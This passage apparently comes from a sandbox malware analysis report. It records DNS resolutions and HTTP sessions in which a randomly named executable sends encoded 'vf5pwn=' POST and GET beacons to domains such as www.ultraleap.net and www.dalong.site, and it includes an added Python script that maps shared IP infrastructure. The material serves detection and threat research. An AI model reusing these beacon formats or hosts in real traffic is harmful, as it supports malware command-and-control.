Sep 26, 2024 15:22:25.016787052 CEST | 1.1.1.1 | 192.168.2.5 | 0x8dbe | No error (0) | www.2bhp.com |  | 81.88.63.46 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:22:40.759285927 CEST | 1.1.1.1 | 192.168.2.5 | 0xc4c4 | No error (0) | www.ultraleap.net | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 15:22:40.759285927 CEST | 1.1.1.1 | 192.168.2.5 | 0xc4c4 | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:22:54.491645098 CEST | 1.1.1.1 | 192.168.2.5 | 0xb255 | No error (0) | www.dalong.site | dalong.site |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 15:22:54.491645098 CEST | 1.1.1.1 | 192.168.2.5 | 0xb255 | No error (0) | dalong.site |  | 172.96.187.60 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:23:07.712119102 CEST | 1.1.1.1 | 192.168.2.5 | 0xad4 | No error (0) | www.mgeducacaopro.online | mgeducacaopro.online |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 15:23:07.712119102 CEST | 1.1.1.1 | 192.168.2.5 | 0xad4 | No error (0) | mgeducacaopro.online |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:23:07.712119102 CEST | 1.1.1.1 | 192.168.2.5 | 0xad4 | No error (0) | mgeducacaopro.online |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:23:22.109816074 CEST | 1.1.1.1 | 192.168.2.5 | 0xd468 | No error (0) | www.heldhold.xyz |  | 67.223.117.189 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:23:37.089288950 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b16 | No error (0) | www.63582.photo | 6ybpt9er.as66588.com |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 15:23:37.089288950 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b16 | No error (0) | 6ybpt9er.as66588.com | azkwupgf.as66588.com |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 15:23:37.089288950 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b16 | No error (0) | azkwupgf.as66588.com |  | 103.248.137.209 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:11.280822992 CEST | 1.1.1.1 | 192.168.2.5 | 0xc5c8 | Name error (3) | www.useanecdotenow.tech | none | none | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:19.360846043 CEST | 1.1.1.1 | 192.168.2.5 | 0x3e04 | No error (0) | www.asiapartnars.online | asiapartnars.online |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 15:24:19.360846043 CEST | 1.1.1.1 | 192.168.2.5 | 0x3e04 | No error (0) | asiapartnars.online |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:19.360846043 CEST | 1.1.1.1 | 192.168.2.5 | 0x3e04 | No error (0) | asiapartnars.online |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:32.532193899 CEST | 1.1.1.1 | 192.168.2.5 | 0x3eae | No error (0) | www.linkwave.cloud | linkwave.cloud |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 26, 2024 15:24:32.532193899 CEST | 1.1.1.1 | 192.168.2.5 | 0x3eae | No error (0) | linkwave.cloud |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:32.532193899 CEST | 1.1.1.1 | 192.168.2.5 | 0x3eae | No error (0) | linkwave.cloud |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:45.893224955 CEST | 1.1.1.1 | 192.168.2.5 | 0xc9d0 | No error (0) | www.mfgarage.net |  | 85.153.138.113 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:59.815284014 CEST | 1.1.1.1 | 192.168.2.5 | 0x5748 | No error (0) | www.b5x7vk.agency |  | 172.67.165.25 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:59.815284014 CEST | 1.1.1.1 | 192.168.2.5 | 0x5748 | No error (0) | www.b5x7vk.agency |  | 104.21.11.31 | A (IP address) | IN (0x0001) | false
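The answer table above is easier to act on once each query's CNAME chain is followed to its A records and the results are compared across names. The Python script below is an added example and not part of the Joe Sandbox report: it takes the answer rows above, copied in as constructed input, rebuilds the resolution of every queried name per transaction ID, reports the NXDOMAIN case, and lists IPs that several of the queried names share. The three names that all land on the 3.33.130.190 / 15.197.148.33 pair fall out of that last step.

```python
"""Rebuild DNS resolutions from sandbox answer records and find shared infrastructure."""
from collections import defaultdict

# Constructed input: (transaction id, queried name) from the DNS query table above.
QUERIES = [
    ("0x8dbe", "www.2bhp.com"), ("0xc4c4", "www.ultraleap.net"),
    ("0xb255", "www.dalong.site"), ("0xad4", "www.mgeducacaopro.online"),
    ("0xd468", "www.heldhold.xyz"), ("0x9b16", "www.63582.photo"),
    ("0xc5c8", "www.useanecdotenow.tech"), ("0x3e04", "www.asiapartnars.online"),
    ("0x3eae", "www.linkwave.cloud"), ("0xc9d0", "www.mfgarage.net"),
    ("0x5748", "www.b5x7vk.agency"),
]

# Constructed input: (transaction id, reply code, name, cname, address) from the
# DNS answer table above; an empty string stands for an empty cell.
ANSWERS = [
    ("0x8dbe", 0, "www.2bhp.com", "", "81.88.63.46"),
    ("0xc4c4", 0, "www.ultraleap.net", "webredir.vip.gandi.net", ""),
    ("0xc4c4", 0, "webredir.vip.gandi.net", "", "217.70.184.50"),
    ("0xb255", 0, "www.dalong.site", "dalong.site", ""),
    ("0xb255", 0, "dalong.site", "", "172.96.187.60"),
    ("0xad4", 0, "www.mgeducacaopro.online", "mgeducacaopro.online", ""),
    ("0xad4", 0, "mgeducacaopro.online", "", "3.33.130.190"),
    ("0xad4", 0, "mgeducacaopro.online", "", "15.197.148.33"),
    ("0xd468", 0, "www.heldhold.xyz", "", "67.223.117.189"),
    ("0x9b16", 0, "www.63582.photo", "6ybpt9er.as66588.com", ""),
    ("0x9b16", 0, "6ybpt9er.as66588.com", "azkwupgf.as66588.com", ""),
    ("0x9b16", 0, "azkwupgf.as66588.com", "", "103.248.137.209"),
    ("0xc5c8", 3, "www.useanecdotenow.tech", "", ""),
    ("0x3e04", 0, "www.asiapartnars.online", "asiapartnars.online", ""),
    ("0x3e04", 0, "asiapartnars.online", "", "3.33.130.190"),
    ("0x3e04", 0, "asiapartnars.online", "", "15.197.148.33"),
    ("0x3eae", 0, "www.linkwave.cloud", "linkwave.cloud", ""),
    ("0x3eae", 0, "linkwave.cloud", "", "3.33.130.190"),
    ("0x3eae", 0, "linkwave.cloud", "", "15.197.148.33"),
    ("0xc9d0", 0, "www.mfgarage.net", "", "85.153.138.113"),
    ("0x5748", 0, "www.b5x7vk.agency", "", "172.67.165.25"),
    ("0x5748", 0, "www.b5x7vk.agency", "", "104.21.11.31"),
]


def resolve(txid, qname, answers):
    """Follow the CNAME chain of one transaction and collect the A records at its end."""
    cnames, addrs, rcode = {}, defaultdict(list), 0
    for tid, rc, name, cname, addr in answers:
        if tid != txid:
            continue
        rcode = rc
        if cname:
            cnames[name] = cname
        if addr:
            addrs[name].append(addr)
    chain, seen, cur = [qname], {qname}, qname
    while cur in cnames:
        cur = cnames[cur]
        if cur in seen:          # a CNAME loop in the data would otherwise spin forever
            break
        seen.add(cur)
        chain.append(cur)
    return {"rcode": rcode, "chain": chain, "addrs": addrs.get(cur, [])}


def resolutions(queries=QUERIES, answers=ANSWERS):
    """Map every queried name to its reply code, CNAME chain and final addresses."""
    return {name: resolve(txid, name, answers) for txid, name in queries}


def shared_ips(res):
    """Return IPs that two or more queried names resolve to, with the names sorted."""
    by_ip = defaultdict(set)
    for name, r in res.items():
        for ip in r["addrs"]:
            by_ip[ip].add(name)
    return {ip: sorted(names) for ip, names in by_ip.items() if len(names) > 1}


if __name__ == "__main__":
    res = resolutions()
    for name, r in res.items():
        status = "NXDOMAIN" if r["rcode"] == 3 else ", ".join(r["addrs"])
        print(f"{name:26} {' -> '.join(r['chain'])}  [{status}]")
    for ip, names in shared_ips(res).items():
        print(f"shared {ip}: {', '.join(names)}")
```

Grouping per transaction ID rather than per name matters when a resolver returns the same CNAME target in several answers; the loop guard is there because nothing in a packet capture stops a misconfigured zone from pointing a CNAME at itself.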
                                              • www.2bhp.com
                                              • www.ultraleap.net
                                              • www.dalong.site
                                              • www.mgeducacaopro.online
                                              • www.heldhold.xyz
                                              • www.63582.photo
                                              • www.asiapartnars.online
                                              • www.linkwave.cloud
                                              • www.mfgarage.net
                                              • www.b5x7vk.agency
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49709 | 81.88.63.46 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:22:25.040668964 CEST | 519 | OUT | GET /a4ar/?vf5pwn=bigEPZ6XMKFUrjbkOOF/tc1QSeZpy4rj9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOCaAaQ3Lxux4SSFbsDgkYjgjAaiC5myZdzdYIguvdh1gvDg==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.2bhp.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Sep 26, 2024 15:22:25.683492899 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:22:25 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49710 | 217.70.184.50 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:22:40.778537035 CEST | 772 | OUT | POST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 4d 66 38 65 42 46 34 4c 75 4c 65 52 6b 6f 73 31 75 4a 4b 65 37 72 63 49 42 2f 4e 63 6e 4d 55 43 79 56 65 59 41 73 3d
                                              Data Ascii: vf5pwn=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jMf8eBF4LuLeRkos1uJKe7rcIB/NcnMUCyVeYAs=
Sep 26, 2024 15:22:41.397710085 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Thu, 26 Sep 2024 13:22:41 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49711 | 217.70.184.50 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:22:43.321964979 CEST | 792 | OUT | POST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 2f 31 49 55 6b 54 45 73 63 79 35 44 4e 50 41 67 73 49 54 49 4d 68 50 70 71 51 58 67 61 33 72 34 76 6b 4b 75 67 70 76 4f 36 45 36 62 6a 47 34 4a 42 4c 48 34 78 51 76 36 4f 4b 59 53 75 4e 5a 32 58 51 61 61 38 72 4d 6d 73 35 4f 45 76 6e 65 73 47 36 50 33 6e 65 68 55 33 48 4c 6e 69 73 57 54 42 79 36 78 55 50 34 55 42 2b 5a 50 44 4c 6c 30 6e 43 7a 67 2f 36 76 4b 4c 39 65 52 51 52 5a 66 4c 42 51 53 46 47 76 4d 42 69 4e 62 48 6b 59 53 33 36 4e 58 74 39 59 52 46 75 47 58 34 47 4f 75 48 58 51 59 2b 4a 61 56 6e 2b 74 46 63 54 33 50 73 54
                                              Data Ascii: vf5pwn=e/XjuvFYh54wiZhAzxjNRLsjQqM3yPQvGWVtc0rW3H/1IUkTEscy5DNPAgsITIMhPpqQXga3r4vkKugpvO6E6bjG4JBLH4xQv6OKYSuNZ2XQaa8rMms5OEvnesG6P3nehU3HLnisWTBy6xUP4UB+ZPDLl0nCzg/6vKL9eRQRZfLBQSFGvMBiNbHkYS36NXt9YRFuGX4GOuHXQY+JaVn+tFcT3PsT
Sep 26, 2024 15:22:43.918278933 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Thu, 26 Sep 2024 13:22:43 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49712 | 217.70.184.50 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:22:45.866069078 CEST | 1809 | OUT | POST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Data Ascii: vf5pwn= [TRUNCATED]
Sep 26, 2024 15:22:46.509876013 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Thu, 26 Sep 2024 13:22:46 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49713 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 2556
Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:22:48.595016956 CEST | 524 | OUT | GET /8pln/?vf5pwn=T9/DtY4QstE2hf5N+QbDCp08BY0+/KIvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9qM2494p5Ur94ranWdRPLWWfdK4ZvNUpqMUToNubzG0SM8g==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ultraleap.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Sep 26, 2024 15:22:49.195121050 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 26 Sep 2024 13:22:49 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Language
                                              Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>ultraleap.net</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
Sep 26, 2024 15:22:49.195178032 CEST | 890 | IN | Data Ascii: raleap.net"><strong>View the WHOIS results of ultraleap.net</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49714 | Destination IP: 172.96.187.60 | Destination Port: 80 | PID: 2556
Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:22:54.511765003 CEST | 766 | OUT | POST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: vf5pwn=1I+bo9ThlE8GqOuGcnSU+Bbd2h1OXOMUeIC3Ri8l8uSR4AE9EDZTcwNBSPpalzTYplAzLM8/2zNugEfxXhAU4NyNIp5XwjNnlYzY7/XkPBvy/icMkTlqdWwvLjoAqV4YQLDHWkNL+kRRQMK5ws4kaKkHuTAI9ylnTzg+hRGFPkSyQN8ln3rFF80IxQEn2RGEx42pD+w=
Sep 26, 2024 15:22:54.968684912 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Thu, 26 Sep 2024 13:22:54 GMT
                                              server: LiteSpeed
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49716 | Destination IP: 172.96.187.60 | Destination Port: 80 | PID: 2556
Process: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 15:22:57.069202900 CEST | 786 | OUT | POST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: vf5pwn=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YKR4h09KhxTSQNBavpV4DSWpldMLOo/21hugBbxXW0V6dyDQZ5G+DNnlYzY77+BPB3y+TsMl2RtQ2wsIjoA8V4iQLCiWhsQ+mZRQOS5394nUKkBgzBAxBFrUV82mBLjTUCWV7RP9VjtWcYwhDMQnhntrbmZdplsI6QJH9KmRFEUVkmojLP7
Sep 26, 2024 15:22:57.503612995 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Thu, 26 Sep 2024 13:22:57 GMT
